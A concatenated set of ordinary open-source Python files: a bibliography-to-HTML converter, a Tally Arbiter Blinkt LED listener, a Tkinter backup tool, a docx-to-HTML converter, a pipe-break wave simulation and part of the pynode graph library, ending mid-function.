print('NOTE: The \'r\' may be necessary on Windows so that '
+ '\'\\\' is not treated as an escape character.')
return
if os.path.isfile(bibfile) is False:
print(bibfile, ' cannot be found at that location.')
print('Please check path and try again.')
return
if (not is_tool('pdflatex')
or not is_tool('bibtex')
or not is_tool('pandoc')):
print("pdflatex, bibtex and pandoc must exist on your command",
" line to use this function.\n")
print("Please see the documentation at:")
print(r"https://github.com/josephcslater/vitae")
return
path = os.path.dirname(bibfile)
if path == '':
path = os.getcwd()
bibfile = os.path.join(path, bibfile)
bibfilename = os.path.basename(bibfile)
bibfilenameroot = bibfilename[:-4]
# No output file specified
if outfile_name is None:
outfile_name = bibfilenameroot + '.html'
outfile_name = os.path.join(path, outfile_name)
if os.path.dirname(outfile_name) == '':
path_output = path
else:
path_output = os.path.dirname(outfile_name)
if not os.path.isdir(path_output) and path_output != '':
print('Specified output path:')
print(path_output)
print('is not a valid path. Please play again.')
return
filename_output = os.path.basename(outfile_name)
root_output = filename_output
if '.' in filename_output:
root_output = filename_output[:filename_output.find('.')]
print(root_output)
# Format the bibs. We just format every one in the file, then use what we
# must later.
formattedbibs, bibs = formatted_bibs(bibfile,
bibliographystyle=bibliographystyle)
print('result of formatting bibs', len(formattedbibs))
bibs = merge_formatted_into_db(formattedbibs, bibs=bibs)
# Keep only bibs by chosen author.
if authorname is not None:
bibs = by_author(authorname, bibs)
# At this point, we have a bibs database with just bibs by authorname
# Next steps:
# 3. Truncate non-desired bibtex_types
bibs = [bib for bib in bibs if bib[3] in bibtex_types]
# Sort by date
bibs_sorted = sorted(bibs, key=lambda paper: paper[0], reverse=True)
# 2. Truncate older articles
if since_year is not None:
bibs_truncated = [bib for bib in bibs_sorted
if int(bib[0]) >= since_year]
else:
bibs_truncated = bibs_sorted
# 4. Truncate beyond numberself.
if number_citations is not None and number_citations < len(bibs_truncated):
bibs_final = bibs_truncated[:number_citations]
else:
bibs_final = bibs_truncated
cwd = os.getcwd()
os.chdir(path_output)
outfile_name_tex = root_output + '.tex'
if os.path.isfile(outfile_name_tex) and not overwrite:
os.rename(outfile_name_tex, outfile_name_tex[:-4]+'_old.tex')
# routine to write out bibs_final bibsfinalfilename
with open(outfile_name_tex, 'w') as filename:
for bib in bibs_final:
filename.write(bib[4])
filename.write('\n')
filename.write('\n')
with open(outfile_name_tex) as f:
newText = f.read().replace('{\\em', '\\emph{')
with open(outfile_name_tex, "w") as f:
f.write(newText)
# Store old version of formatted references.
if os.path.isfile(filename_output) and not overwrite:
print('\n\n',
filename_output,
'moved to',
filename_output[:filename_output.find('.')]
+ '_old'
+ filename_output[filename_output.find('.'):],
'\n\n')
os.rename(filename_output,
filename_output[:filename_output.find('.')]
+ '_old'
+ filename_output[filename_output.find('.'):])
pandoc_args = ' '
if standalone:
pandoc_args = ' -s -V "pagetitle:My Bibs" -V "title:My Bibs" '
pandocstring = ("pandoc "
+ pandoc_args
+ outfile_name_tex
+ " -o "
+ filename_output)
os.system(pandocstring)
os.chdir(cwd)
if __name__ == '__main__':
print('executing from command line')
``` |
{
"source": "josephdadams/TallyArbiter-Pimoroni-Blinkt-listener",
"score": 2
} |
#### File: josephdadams/TallyArbiter-Pimoroni-Blinkt-listener/tallyarbiter-pimoroni-blinkt-listener.py
```python
from signal import signal, SIGINT
from sys import exit
import sys
import time
import blinkt
import socketio
import json
device_states = []
bus_options = []
mode_preview = False
mode_program = False
server = sys.argv[1]
stored_deviceId = ''
blinkt.set_clear_on_exit(True)
debounce = False #used to keep calls from happing concurrently
try:
stored_deviceId_file = open('deviceid.txt')
stored_deviceId = stored_deviceId_file.read()
stored_deviceId_file.close()
except IOError:
stored_deviceId = ''
print('Last Used Device Id: ' + stored_deviceId)
if len(sys.argv) > 2:
port = sys.argv[2]
else:
port = '4455'
if len(sys.argv) > 3:
deviceId = sys.argv[3]
else:
if (stored_deviceId != ''):
deviceId = stored_deviceId
else:
deviceId = 'null'
#SocketIO Connections
sio = socketio.Client()
@sio.event
def connect():
print('Connected to Tally Arbiter server:', server, port)
sio.emit('bus_options') # get current bus options
sio.emit('device_listen_blink', {'deviceId': deviceId}) # start listening for the device
repeatNumber = 2
while(repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 255, 0)
time.sleep(.3)
@sio.event
def connect_error(data):
print('Unable to connect to Tally Arbiter server:', server, port)
doBlink(150, 150, 150)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def disconnect():
print('Disconnected from Tally Arbiter server:', server, port)
doBlink(255, 255, 255)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def reconnect():
print('Reconnected to Tally Arbiter server:', server, port)
repeatNumber = 2
while(repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.on('device_states')
def on_device_states(data):
global device_states
device_states = data
processTallyData()
@sio.on('bus_options')
def on_bus_options(data):
global bus_options
bus_options = data
@sio.on('flash')
def on_flash():
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
evaluateMode()
@sio.on('reassign')
def on_reassign(oldDeviceId, newDeviceId):
print('Reassigning from DeviceID: ' + oldDeviceId + ' to Device ID: ' + newDeviceId)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
sio.emit('listener_reassign', data=(oldDeviceId, newDeviceId))
global deviceId
deviceId = newDeviceId
stored_deviceId_file = open('deviceid.txt', 'w')
stored_deviceId_file.write(newDeviceId)
stored_deviceId_file.close()
def getBusTypeById(busId):
for bus in bus_options:
if bus['id'] == busId:
return bus['type']
def processTallyData():
global mode_preview
global mode_program
for device_state in device_states:
if getBusTypeById(device_state['busId']) == 'preview':
if len(device_state['sources']) > 0:
mode_preview = True
else:
mode_preview = False
elif getBusTypeById(device_state['busId']) == 'program':
if len(device_state['sources']) > 0:
mode_program = True
else:
mode_program = False
evaluateMode()
def evaluateMode():
if (mode_preview == True) and (mode_program == False): # preview mode, color it green
doBlink(0, 255, 0)
elif (mode_preview == False) and (mode_program == True): # program mode, color it red
doBlink(255, 0, 0)
elif (mode_preview == True) and (mode_program == True): # preview+program mode, color it yellow
doBlink(255, 255, 0)
else: # no source, turn it off
doBlink(0, 0, 0)
def doBlink(r, g, b):
global debounce
if (debounce != True):
debounce = True
blinkt.set_all(r, g, b)
blinkt.show()
debounce = False
while(1):
try:
sio.connect('http://' + server + ':' + port)
sio.wait()
print('Tally Arbiter Listener Running. Press CTRL-C to exit.')
print('Attempting to connect to Tally Arbiter server: ' + server + '(' + port + ')')
except KeyboardInterrupt:
print('Exiting Tally Arbiter Listener.')
doBlink(0, 0, 0)
exit(0)
except socketio.exceptions.ConnectionError:
doBlink(0, 0, 0)
time.sleep(15)
except:
print("Unexpected error:", sys.exc_info()[0])
print('An error occurred internally.')
doBlink(0, 0, 0)
``` |
{
"source": "josephdaurora/simplebackup",
"score": 3
} |
#### File: josephdaurora/simplebackup/main.py
```python
from tkinter import *
from tkinter import filedialog
from shutil import copytree
def checker():
if (source != None) and (destination != None):
Button(root, justify="center", text="Begin Copying", command=lambda: copytree(source, destination, dirs_exist_ok=True)).place(bordermode="outside", anchor="center", x=400, y=300)
def getDirectories(location):
global source
global destination
if location == "source":
source = filedialog.askdirectory()
Label(root, text=source).place(bordermode="outside", anchor="center", x=400, y=100)
if location == "destination":
destination = filedialog.askdirectory()
Label(root, text=destination).place(bordermode="outside", anchor="center", x=400, y=200)
checker()
source = None
destination = None
root = Tk()
root.title("Simple Backup")
root.geometry("800x600")
Button(root, justify="center", text="Choose Source Directory", command=lambda: getDirectories("source")).place(bordermode="outside", anchor="center", x=400, y=50)
Button(root, justify="center", text="Choose Destination Directory", command=lambda: getDirectories("destination")).place(bordermode="outside", anchor="center", x=400, y=150)
root.mainloop()
``` |
{
"source": "JosephDavidTalbot/JosephDavidTalbot.github.io",
"score": 3
} |
#### File: JosephDavidTalbot.github.io/downloads/Docx Converter.py
```python
import docx, os, time, string, unicodedata
def convertDoc(docPath):
try:
docFile = docx.Document(docPath)
except:
print("Error: invalid filepath. "+docPath+" cannot be opened.")
return
docName = (docPath.split('.'))[0]
htmlFile = open(docName+".html", 'w', encoding='utf-8')
htmlFile.write('');
htmlFile.close()
htmlFile = open(docName+".html", 'a', encoding='utf-8')
para = docFile.paragraphs
for p in para:
temp = ""
if p.style == 'normal':
temp += "<p>\n"
elif p.style == 'Heading 1':
temp += "<h1>\n"
elif p.style == 'Title':
temp += "<h1>\n"
elif p.style == 'Heading 2':
temp += "<h2>\n"
elif p.style == 'Heading 3':
temp += "<h3>\n"
elif p.style == 'Heading 4':
temp += "<h4>\n"
elif p.style == 'Heading 5':
temp += "<h5>\n"
elif p.style == 'Heading 6':
temp += "<h6>\n"
elif p.style == 'Heading 7':
temp += "<h7>\n"
elif p.style == 'Heading 8':
temp += "<h8>\n"
elif p.style == 'Heading 9':
temp += "<h9>\n"
else:
temp += "<p>\n"
for i, r in enumerate(p.runs):
if(p.runs[i].bold):
temp+=("<strong>")
if(p.runs[i].italic):
temp+=("<em>")
'''temp2 = r.text
if("\n" in temp2):
temp2=temp2.replace("\n","<br/>\n")'''
if r.text == '':
temp+='<br/>'
else:
temp+=r.text.replace("\n","<br/>\n")
#temp+=(temp2)
if(p.runs[i].bold):
temp+=("</strong>")
if(p.runs[i].italic):
temp+=("</em>")
if p.style == 'normal':
temp+= "\n</p>\n\n"
elif p.style == 'Heading 1':
temp+= "\n</h1>\n\n"
elif p.style == 'Heading 2':
temp+= "\n</h2>\n\n"
elif p.style == 'Heading 3':
temp+= "\n</h3>\n\n"
elif p.style == 'Heading 4':
temp+= "\n</h4>\n\n"
elif p.style == 'Heading 5':
temp+= "\n</h5>\n\n"
elif p.style == 'Heading 6':
temp+= "\n</h6>\n\n"
elif p.style == 'Heading 7':
temp+= "\n</h7>\n\n"
elif p.style == 'Heading 8':
temp+= "\n</h8>\n\n"
elif p.style == 'Heading 9':
temp+= "\n</h9>\n\n"
else:
temp+=("\n</p>\n\n")
htmlFile.write(temp)
htmlFile.close()
valid_filename_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
char_limit = 255
def clean_filename(filename, whitelist=valid_filename_chars, replace=' '):
# replace spaces
for r in replace:
filename = filename.replace(r,'_')
# keep only valid ascii chars
cleaned_filename = unicodedata.normalize('NFKD', filename).encode('ASCII', 'ignore').decode()
# keep only whitelisted chars
cleaned_filename = ''.join(c for c in cleaned_filename if c in whitelist)
if len(cleaned_filename)>char_limit:
print("Warning, filename truncated because it was over {}. Filenames may no longer be unique".format(char_limit))
return cleaned_filename[:char_limit]
#Main
print("Please enter the filename of the document you wish to convert.")
docPath=input()
start = time.time()
print('Starting...\n\n')
convertDoc(docPath)
print('All done!')
end = time.time()
print('Elapsed time: '+(str(end - start)))
``` |
{
"source": "Joseph-Davies/VCE-algorithmics-project-2",
"score": 3
} |
#### File: Joseph-Davies/VCE-algorithmics-project-2/project_2.py
```python
from pynode.main import *
import ast
import sys
import time
from ADTs import *
#CLI flags
defaults = False
animation_speed = 1.0
time_factor = 1.0
#evaluate CLI flags
i = 0
while i < len(sys.argv):
arg = sys.argv[i]
if arg == "-defaults":
defaults = True
print("using defaults data collumns")
if arg.startswith("-animation_speed="):
animation_speed = float(arg[17:])
time_factor = animation_speed
#take the reciprocal
animation_speed = 1 / animation_speed
print("set animation speed to {0}x".format(time_factor))
i += 1
del i
node_1 = None
node_2 = None
active_edge = None
is_running = False
#references to nodes
node_clear = None
node_start = None
node_time = None
#list of sensors and nodes
sensor_nodes = list()
break_nodes = list()
#simulation variables
start_time = 0
simulation_time = 0
wave_propogation_pqueue = priority_queue()
time_node_value = -1
#reset all selected nodes
def reset():
global node_1, node_2, active_edge
if node_1 in sensor_nodes:
node_1.set_color(Color(150, 50, 150))
elif node_1 in break_nodes:
node_1.set_color(Color(50, 100, 200))
else:
node_1.set_color(Color.DARK_GREY)
if node_2 in sensor_nodes:
node_2.set_color(Color(150, 50, 150))
elif node_2 in break_nodes:
node_2.set_color(Color(50, 100, 200))
else:
node_2.set_color(Color.DARK_GREY)
if active_edge is not None:
active_edge.set_color(Color.LIGHT_GREY)
node_1 = None
node_2 = None
active_edge = None
#convert a number to a float if it can otherwise return None
def is_float(posible_int):
output = None
try:
output = float(posible_int)
except:
output = None
return output
#function to get the users input
def prompt(request_length = False, request_time = False):
first = None
second = None
third = None
#ask the user weather they want to add a break or a sensor
while True:
print("What would you like to do:")
input_1 = input("Add a break (b), add a sensor (s), cancel (c): ").lower().rstrip()
if input_1 == "b":
first = input_1
break
elif input_1 == "s":
first = input_1
break
elif input_1 == "c":
return (None, None, None)
else:
print("Invalid Input")
#ask the user how far from the first node they clicked they want to new node to be
if request_length:
while True:
input_2 = is_float(input("How far along the pipe do you want to add it in meters: ").lower().rstrip())
if input_2 != None:
second = input_2
break
else:
print("Invalid Input")
#ask the user when they want a break to occur
if request_time and first == "b":
while True:
input_3 = is_float(input("At what time does the break happen: ").lower().rstrip())
if input_3 != None:
third = input_3
break
else:
print("Invalid Input")
return (first, second, third)
def on_click(node):
global node_1, node_2, active_edge, is_running
print("Clicked on node \"{}\"".format(node.id()))
#start node
if node is node_start and not is_running:
is_running = True
simulate()
return
#disable user input if the application is running
if not is_running:
#clear selection node
if node is node_clear:
reset()
return
#if both nodes have been selected and you select a third reset the selection
if node_1 is not None and node_2 is not None:
reset()
#if node 1 has not been selected select it
if node_1 is None:
node_1 = node
node_1.set_color(Color.YELLOW)
#if node 1 has been selected and node 2 has not been selected select node 2
elif node_2 is None:
node_2 = node
node_2.set_color(Color.GREEN)
#if the two selected nodes are different highlight the edge between them
if node_1 is not None and node_2 is not None and node_1 is not node_2:
try:
active_edge = graph.edges_between(node_1, node_2)[0]
active_edge.set_color(Color.BLUE)
except Exception as e:
print("Cannot find edge between selected nodes")
print(e)
return
#if both nodes have been selected ask the user what to do
if node_1 is not None and node_2 is not None:
#ask the user for what they want to do
#if the two nodes are different ask for the edge between them
if active_edge is not None:
new_thing_type, new_thing_length, new_thing_time = prompt(True, True)
#if the two nodes are the same then don't ask the for the edge
else:
new_thing_type, new_thing_length, new_thing_time = prompt(False, True)
#if nothing is got from the user then just reset
if new_thing_type is None and new_thing_length is None:
reset()
return
#if a length is specified aka the new node is between nodes
if new_thing_length != None:
#break
if new_thing_type == "b":
#add the node
new_node = graph.add_node("Break: " + str(len(break_nodes) + 1))
new_node.set_color(Color(50, 100, 200))
new_node.set_attribute("time", new_thing_time)
#calculat new edge lengths and ingore fp rounding errors
length_1 = round(new_thing_length, 1)
length_2 = round(active_edge.weight() - new_thing_length, 1)
#add the edges
new_edge_1 = graph.add_edge(node_1, new_node)
new_edge_1.set_weight(length_1)
new_edge_1.set_attribute("length", length_1)
new_edge_1.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_1.set_attribute("speed", active_edge.attribute("speed"))
new_edge_2 = graph.add_edge(new_node, node_2)
new_edge_2.set_weight(length_2)
new_edge_2.set_attribute("length", length_2)
new_edge_2.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_2.set_attribute("speed", active_edge.attribute("speed"))
#remove the old edge
graph.remove_edge(active_edge)
active_edge = None
#record the break node
break_nodes.append(new_node)
#sensor
elif new_thing_type == "s":
#add the node
new_node = graph.add_node("Sensor: " + str(len(sensor_nodes) + 1))
new_node.set_color(Color(150, 50, 150))
#calculat new edge lengths and ingore fp rounding errors
length_1 = round(new_thing_length, 1)
length_2 = round(active_edge.weight() - new_thing_length, 1)
#add the edges
new_edge_1 = graph.add_edge(node_1, new_node)
new_edge_1.set_weight(length_1)
new_edge_1.set_attribute("length", length_1)
new_edge_1.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_1.set_attribute("speed", active_edge.attribute("speed"))
new_edge_2 = graph.add_edge(new_node, node_2)
new_edge_2.set_weight(length_2)
new_edge_2.set_attribute("length", length_2)
new_edge_2.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_2.set_attribute("speed", active_edge.attribute("speed"))
#remove the old edge
graph.remove_edge(active_edge)
active_edge = None
#record the break node
sensor_nodes.append(new_node)
#if no length is specified aka the break is being placed over another node
else:
#break
if new_thing_type == "b":
#record all the surrounging nodes and edge weights
things_to_reconect_to = list()
for edge in node_1.incident_edges():
things_to_reconect_to.append((edge.other_node(node_1), edge.weight(), edge.attribute("speed"), edge.attribute("inner radius")))
#remove the current node
graph.remove_node(node_1)
#add the new node
new_node = graph.add_node("Break: " + str(len(break_nodes) + 1))
new_node.set_color(Color(50, 100, 200))
new_node.set_attribute("time", new_thing_time)
#reconnect node to it's surroundings
for thing in things_to_reconect_to:
node_to_conect_to, weight, wave_speed, pipe_i_radius = thing
new_edge = graph.add_edge(new_node, node_to_conect_to)
new_edge.set_weight(weight)
new_edge.set_attribute("length", weight)
new_edge.set_attribute("inner radius", pipe_i_radius)
new_edge.set_attribute("speed", wave_speed)
#record the break node
break_nodes.append(new_node)
elif new_thing_type == "s":
#record all the surrounging nodes and edge weights
things_to_reconect_to = list()
for edge in node_1.incident_edges():
things_to_reconect_to.append((edge.other_node(node_1), edge.weight(), edge.attribute("speed"), edge.attribute("inner radius")))
#remove the current node
graph.remove_node(node_1)
#add the new node
new_node = graph.add_node("Sensor: " + str(len(sensor_nodes) + 1))
new_node.set_color(Color(150, 50, 150))
#reconnect node to it's surroundings
for thing in things_to_reconect_to:
node_to_conect_to, weight, wave_speed, pipe_i_radius = thing
new_edge = graph.add_edge(new_node, node_to_conect_to)
new_edge.set_weight(weight)
new_edge.set_attribute("length", weight)
new_edge.set_attribute("inner radius", pipe_i_radius)
new_edge.set_attribute("speed", wave_speed)
#record the sensor node
sensor_nodes.append(new_node)
def simulate():
global start_time, wave_propogation_pqueue
print("starting simulation")
#put the breaks into a priority queue of when they will trigger
#set the node they came from to 0 because they are sources
for node in break_nodes:
wave_propogation_pqueue.enqueue((node, None), node.attribute("time"))
start_time = time.time()
print("start time", start_time)
print("====================================================")
should_continue = True
while should_continue:
should_continue = simulation_itteration()
def simulation_itteration():
global simulation_time, node_time, time_node_value
simulation_time = time.time() - start_time
simulation_time *= time_factor
t_node_val = round(simulation_time, 1)
if t_node_val != time_node_value:
node_time.set_value("t={0}".format(t_node_val))
time_node_value = t_node_val
#if there is nothing left in the queue signal to stop itterating
if wave_propogation_pqueue.length() == 0: return False
hit_time = wave_propogation_pqueue.front_priority()
if simulation_time > hit_time:
node, node_from = wave_propogation_pqueue.dequeue()
if node in sensor_nodes:
print("hit {0} at {1}".format(node.id(), simulation_time))
#n_to = node.id()
#n_from = node_from.id() if node_from is not None else "No node"
#print("{0} -> {1}".format(n_from, n_to))
#print("@ {0}".format(hit_time))
#print("----------------------------------------------------")
for edge in node.incident_edges():
other_node = edge.other_node(node)
if other_node is node_from: continue
#time in seconds for the wave to move along the pipe
wave_time = edge.attribute("length") / edge.attribute("speed")
#convert to miliseconds
wave_time_ms = wave_time * 1000
#multiply by animation time
wave_time_ms *= animation_speed
edge.traverse(node, Color.RED, True, wave_time_ms)
thing_to_enqueue = (other_node, node)
wave_propogation_pqueue.enqueue(thing_to_enqueue, hit_time + wave_time)
#continue to the next itteration
return True
nodes = dict()
#if the node does not exist make it and return a reference to a node. if the node does exist return a reference to it
def get_node(name):
if name in nodes:
return nodes[name]
else:
node = graph.add_node(name)
nodes[name] = node
#if the edge does not exist make it and return it if it does exist return it
#if the egde involves nodes that do not exist make them
def get_edge(node_1, node_2):
if graph.adjacent(get_node(node_1), get_node(node_2)):
return graph.edges_between(get_node(node_1), get_node(node_2))[0]
else:
edge = graph.add_edge(get_node(node_1), get_node(node_2))
return edge
def run():
global node_clear, node_start, node_time
#user interface nodes
node_clear = graph.add_node("Clear")
node_clear.set_color(Color.RED)
node_clear.set_position(50, 480)
node_start = graph.add_node("Start")
node_start.set_color(Color.RED)
node_start.set_position(100, 480)
node_time = graph.add_node("t=0")
node_time.set_color(Color.BLACK)
node_time.set_position(150, 480)
length_index = 2
diameter_index = 3
thickness_index = 7
speed_index = 10
#if the user does not specify the -defaults flag then ask then what columns to get the data from
if not defaults:
length_index = input("What collumn is the lengin in: ")
diameter_index = input("What collumn is the diameter in: ")
thickness_index = input("What collumn is the thicnkess in: ")
speed_index = input("What collumn is the speed in: ")
#construt the graph
with open("pipes.csv", 'r') as csv_file:
first = True
for line in csv_file:
#if it is the first line ignore it as it is the header
if first:
first = False
continue
#split the data into columns
data = line.rstrip().lstrip().replace("\t","").split(',')
#where posible evaluate literals
i = 0
while i < len(data):
try:
data[i] = ast.literal_eval(data[i])
i += 1
except:
i += 1
for element in data:
#get the edge between the two nodes in the line
#if the edge does not exist create it
#if either of the nodes do not exist create them
e = get_edge(data[0], data[1])
#set the values of the edge
e.set_weight(data[length_index])
e.set_attribute("length", data[length_index])
e.set_attribute("inner radius", (data[diameter_index] - 2 * data[thickness_index]) / 2)
e.set_attribute("speed", data[speed_index])
register_click_listener(on_click)
begin_pynode(run)
```
#### File: pynode/src/pynode_graphlib.py
```python
from pynode.src import pynode_core
import random
def pause(time):
pynode_core.add_event(pynode_core.EventPause(time))
def delay(func, time, args=[], repeat=False):
def execute():
pynode_core.execute_function(func, args)
if repeat:
delay_id = pynode_core.timer.set_interval(execute, time)
pynode_core.PynodeCoreGlobals.delay_type[delay_id] = 1
return delay_id
else:
delay_id = pynode_core.timer.set_timeout(execute, time)
pynode_core.PynodeCoreGlobals.delay_type[delay_id] = 0
return delay_id
def cancel_delay(delay_id):
if delay_id in pynode_core.PynodeCoreGlobals.delay_type:
if pynode_core.PynodeCoreGlobals.delay_type[delay_id] == 1: pynode_core.timer.clear_interval(delay_id)
else: pynode_core.timer.clear_timeout(delay_id)
del pynode_core.PynodeCoreGlobals.delay_type[delay_id]
def clear_delays():
delay_ids = list(pynode_core.PynodeCoreGlobals.delay_type.keys())
for delay_id in delay_ids:
cancel_delay(delay_id)
def print_debug(value):
pynode_core.do_print(str(value) + "\n")
def register_click_listener(func):
pynode_core.PynodeCoreGlobals.click_listener_func["f"] = func
class Color:
def __init__(self, red, green, blue, transparent=False):
self._red = red; self._green = green; self._blue = blue
self._transparent = transparent
@staticmethod
def rgb(red, green, blue):
return Color(red, green, blue)
def hex_string(self):
if self._transparent: return "transparent"
else: return "#%02x%02x%02x" % (self._red, self._green, self._blue)
def __str__(self):
return "(" + str(self._red) + "," + str(self._green) + "," + str(self._blue) + ")"
def red(self): return self._red
def green(self): return self._green
def blue(self): return self._blue
Color.RED = Color(180, 0, 0)
Color.GREEN = Color(0, 150, 0)
Color.BLUE = Color(0, 0, 200)
Color.YELLOW = Color(255, 215, 0)
Color.WHITE = Color(255, 255, 255)
Color.LIGHT_GREY = Color(199, 199, 199)
Color.GREY = Color(127, 127, 127)
Color.DARK_GREY = Color(82, 82, 82)
Color.BLACK = Color(0, 0, 0)
Color.TRANSPARENT = Color(0, 0, 0, True)
class CustomStyle:
def __init__(self, size, color, outline=Color.TRANSPARENT):
self._size = size
self._color = color
self._outline = outline
self._has_outline = outline is not None
def data(self, element):
return str(self._size) + "," + self._color.hex_string() + "," + (element._color.hex_string() if self._outline is None else self._outline.hex_string()) + "," + str(self._has_outline)
class Node:
def __init__(self, *args, **kwds):
arg_id = kwds["id"] if "id" in kwds else args[0] if len(args) > 0 else pynode_core.next_user_id()
arg_value = kwds["value"] if "value" in kwds else args[1] if len(args) > 1 else arg_id
self._id = arg_id
self._value = arg_value
self._incident_edges = []
self._attributes = {}
self._priority = 0
self._position = None
self._is_pos_relative = False
self._labels = ["", ""]
self._size = 12
self._color = Color.DARK_GREY
self._value_style = CustomStyle(13, Color.WHITE, None)
self._label_styles = [CustomStyle(10, Color.GREY), CustomStyle(10, Color.GREY)]
self._internal_id = pynode_core.next_global_id()
def set_value(self, value):
self._value = value
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value, [self._internal_id, str(value) if value is not None else ""]), self)
return self
def value(self):
return self._value
def incident_edges(self):
return list(self._incident_edges)
def incoming_edges(self):
return [e for e in self._incident_edges if not e._directed or e._target == self]
def outgoing_edges(self):
return [e for e in self._incident_edges if not e._directed or e._source == self]
def adjacent_nodes(self):
return [e._source if e._target is self else e._target for e in self._incident_edges]
def predecessor_nodes(self):
return [e._source if e._target is self else e._target for e in self.incoming_edges()]
def successor_nodes(self):
return [e._source if e._target is self else e._target for e in self.outgoing_edges()]
def degree(self): return len(self._incident_edges)
def indegree(self): return len(self.incoming_edges())
def outdegree(self): return len(self.outgoing_edges())
def set_attribute(self, name, value):
self._attributes[name] = value
return self
def attribute(self, name):
return self._attributes[name] if name in self._attributes else None
def set_priority(self, value):
self._priority = value
return self
def priority(self):
return self._priority
def set_position(self, x, y=None, relative=False):
self._position = [x, y]
if x is None or y is None: self._position = None
self._is_pos_relative = relative
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_position, [self._internal_id, x, y, relative]), self)
return self
# Note: Function should be used asynchronously in the online version. Call it in delayed and/or click listener functions.
def position(self):
data = pynode_core.get_data((pynode_core.Event(pynode_core.js_node_get_position, [self._internal_id])))
if graph.has_node(self) and data is not None and data[0] is not None and data[1] is not None:
return int(data[0]), int(data[1])
elif self._position is None: return None
else:
if self._is_pos_relative and data is not None and data[2] is not None and data[3] is not None:
return int(self._position[0] * data[2]), int(self._position[1] * data[3])
else: return int(self._position[0]), int(self._position[1])
def set_label(self, text, label_id=0):
self._labels[label_id] = text
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label, [self._internal_id, str(text) if text is not None else "", label_id]), self)
return self
def label(self, label_id=0):
return self._labels[label_id]
def set_size(self, size):
self._size = size
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_size, [self._internal_id, size]), self)
return self
def size(self): return self._size
def set_color(self, color):
self._color = color
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_color, [self._internal_id, color.hex_string(), self._value_style.data(self)]), self)
return self
def color(self): return self._color
def set_text_size(self, size):
self._value_style._size = size
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value_style, [self._internal_id, self._value_style.data(self)]), self)
return self
def set_text_color(self, color):
self._value_style._color = color
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value_style, [self._internal_id, self._value_style.data(self)]), self)
return self
def set_value_style(self, size=None, color=None, outline=-1):
self._value_style = CustomStyle(self._value_style._size if size is None else size, self._value_style._color if color is None else color, self._value_style._outline if outline == -1 else outline)
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value_style, [self._internal_id, self._value_style.data(self)]), self)
return self
def set_label_style(self, size=None, color=None, outline=None, label_id=None):
if label_id is None or (label_id != 0 and label_id != 1):
style1 = CustomStyle(self._label_styles[0]._size if size is None else size, self._label_styles[0]._color if color is None else color, self._label_styles[0]._outline if outline is None else outline)
style2 = CustomStyle(self._label_styles[1]._size if size is None else size, self._label_styles[1]._color if color is None else color, self._label_styles[1]._outline if outline is None else outline)
self._label_styles[0] = style1
self._label_styles[1] = style2
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label_style, [self._internal_id, self._label_styles[0].data(self), 0]), self)
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label_style, [self._internal_id, self._label_styles[1].data(self), 1]), self)
else:
style = CustomStyle(self._label_styles[label_id]._size if size is None else size,Color.WHITE if color is None else color, outline)
self._label_styles[label_id] = style
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label_style, [self._internal_id, self._label_styles[label_id].data(self), label_id]), self)
return self
def highlight(self, *args, **kwds):
arg_color = kwds["color"] if "color" in kwds else args[0] if len(args) > 0 else None
arg_size = kwds["size"] if "size" in kwds else args[1] if len(args) > 1 else self._size * 1.5
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_highlight, [self._internal_id, arg_size, arg_color.hex_string() if arg_color is not None else None]), self)
def id(self):
return self._id
def _data(self):
d = {"id": self._internal_id, "label": str(self._value) if self._value is not None else "", "labelStyle": self._value_style.data(self), "topRightLabel": str(self._labels[0]) if self._labels[0] is not None else "", "topLeftLabel": str(self._labels[1]) if self._labels[1] is not None else "", "topRightLabelStyle": self._label_styles[0].data(self), "topLeftLabelStyle": self._label_styles[1].data(self), "r": self._size, "color": self._color.hex_string(), "fixed": (self._position is not None), "static": (self._position is not None), "ax": 0, "ay": 0, "rx": 0.0, "ry": 0.0, "relativePosition": False}
if self._position is not None:
if self._is_pos_relative:
d["relativePosition"] = True
d["rx"] = self._position[0]; d["ry"] = self._position[1]
else:
d["ax"] = self._position[0]; d["ay"] = self._position[1]
d["x"] = self._position[0]; d["y"] = self._position[1]
return d
def __lt__(self, other): return self._priority < other._priority if isinstance(other, Node) else NotImplemented
def __le__(self, other): return self._priority <= other._priority if isinstance(other, Node) else NotImplemented
def __gt__(self, other): return self._priority > other._priority if isinstance(other, Node) else NotImplemented
def __ge__(self, other): return self._priority >= other._priority if isinstance(other, Node) else NotImplemented
def __str__(self):
return str(self._id)
def __repr__(self):
return "node({0})".format(str(self._id))
class Edge:
def __init__(self, source, target, weight=None, directed=False):
self._source = source
self._target = target
self._weight = weight
self._directed = directed
self._attributes = {}
self._priority = 0
self._width = 2
self._color = Color.LIGHT_GREY
self._weight_style = CustomStyle(10, Color.GREY)
self._internal_id = pynode_core.next_global_id()
def source(self, target=None):
# Deprecated
if target is not None: return self.other_node(target)
